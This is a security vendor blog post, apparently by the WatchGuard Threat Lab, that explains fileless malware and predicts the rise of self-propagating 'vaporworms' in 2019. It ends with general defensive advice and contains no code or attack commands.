Not too long ago, the WatchGuard Threat Lab predicted the emergence of vaporworms as a major new cyber threat that will affect organizations of all sizes in 2019. We coined the term to describe a new breed of fileless malware with self-propagating, wormlike properties. At the time of the initial prediction, our team was fairly sure this idea was more than conjecture, but now the advent of the vaporworm in 2019 seems to be an abject certainty.
But before I get into why and how this new threat will pick up steam this year, let’s take a step back to first examine fileless attacks and how they differ from traditional malware.
The fundamentals of fileless malware
Most conventional malware variants require users to save and execute a file on their system. The file itself could be a standalone executable binary, a trojanized application, or even just a blob of instructions and data that another component loads and runs. There are many opportunities to catch traditional malware, both as it traverses the network and when it is finally saved onto a system.
Fileless malware turns everything on its head. As the name suggests, fileless malware does not save anything to the target system’s storage for persistence. Instead, it leverages PowerShell and scripts, or even exploits legitimate processes to inject itself into computer memory and execute directly from there. Fileless malware is much better at covering its tracks because it doesn’t leave anything behind for traditional anti-malware tools to scan.
From recent headlines alone, you’re probably aware that fileless malware has been on a tear in recent years. According to one Ponemon report on the state of endpoint security, 29 percent of attacks used fileless malware in 2017. That’s a massive number, considering the fact that this type of malware is still relatively new. Even more frightening, 77 percent of all successful attacks in 2017 involved the use of fileless malware. The bottom line is, fileless malware is effective, which means it will continue to grow in prevalence over the coming years.
A new twist
Predicting the continued growth of fileless malware in 2019 would’ve been easy – almost a given for such a popular attack. Instead, we hypothesized that fileless malware might follow a similar evolutionary path to that of ransomware in 2017. That is, it will add worm-like self-propagation characteristics.
In April 2017, The Shadow Brokers leaked several Microsoft Windows zero-day vulnerabilities allegedly stolen from the NSA. It only took a month for ransomware authors to add these exploits to the first ever ransomworm: WannaCry. This simple, yet devastating evolution turned Wannacry into one of the most destructive ransomware attacks in history.
Simply put, we suspected that cyber criminals would copy this trend, turning traditional fileless attacks into vaporworms by adding network exploits to proliferate across the internet automatically without any user interaction. Although there’s no way of knowing whether the first slew of these attacks will rely on old flaws like those that fueled WannaCry, or new releases yet to come, it’s clear that should vaporworms gain favor among bad guys in 2019, they’ll have the same far-reaching and indiscriminate impact that we saw with WannaCry.
The dawn of the vaporworm
Unfortunately, this prediction seems to be coming true uncomfortably quickly. Just one short month after we predicted the unholy emergence of self-propagating fileless malware, researchers at Trend Micro discovered a fileless Trojan that seemed to present some of those very same characteristics.
First, the malware saved its malicious payload in the Windows Registry, a key-value database that Windows stores in memory. It then created a second registry entry that instructed the operating system to load the payload from memory and execute every time it booted, giving it persistence. To spread, the malware installed a copy of itself on any removable storage connected to the system (thumb drives, external hard drives, etc.).
While this malware was quite interesting in its combination of fileless execution and worm-like propagation using removable storage, it wasn’t a full-blown network worm like we saw spreading the Wannacry ransomworm in 2017. Network propagation is what differentiates a “good” computer worm from a “great” computer worm, at least when it comes to infection rates.
Network propagation also makes it incredibly difficult to root out every infection from an attack. Imagine a scenario where a nation state wants to siphon off engineering work from a foreign defense contractor. In the not-too-distant future, we could see an incredibly effective and dangerous malware attack that combines Wannacry’s rapid propagation with fileless malware’s ability to hide its presence. And as countless attack techniques have demonstrated previously, what starts with nation states usually trickles down to the civilian cyber-criminal world soon enough.
Avoid becoming a vaporworm victim in 2019
It still remains to be seen how prevalent vaporworms will become. Every organization, regardless of size or industry, must now be prepared to defend against these attacks. Fileless malware is notoriously tricky to identify, and the added self-spreading mechanism only amplifies the challenge.
Fortunately, tools like intrusion prevention services are capable of detecting and blocking network exploits, and halting vaporworm infections. Additionally, Endpoint Detection and Response (EDR) solutions that monitor process behavior for suspicious activity can detect malicious activity before it’s too late. As always, understanding the threat is half the battle. By educating yourself and your organization about the potential for and mechanics of vaporworm attacks, you can ensure you have the necessary protections in place to avoid becoming a victim.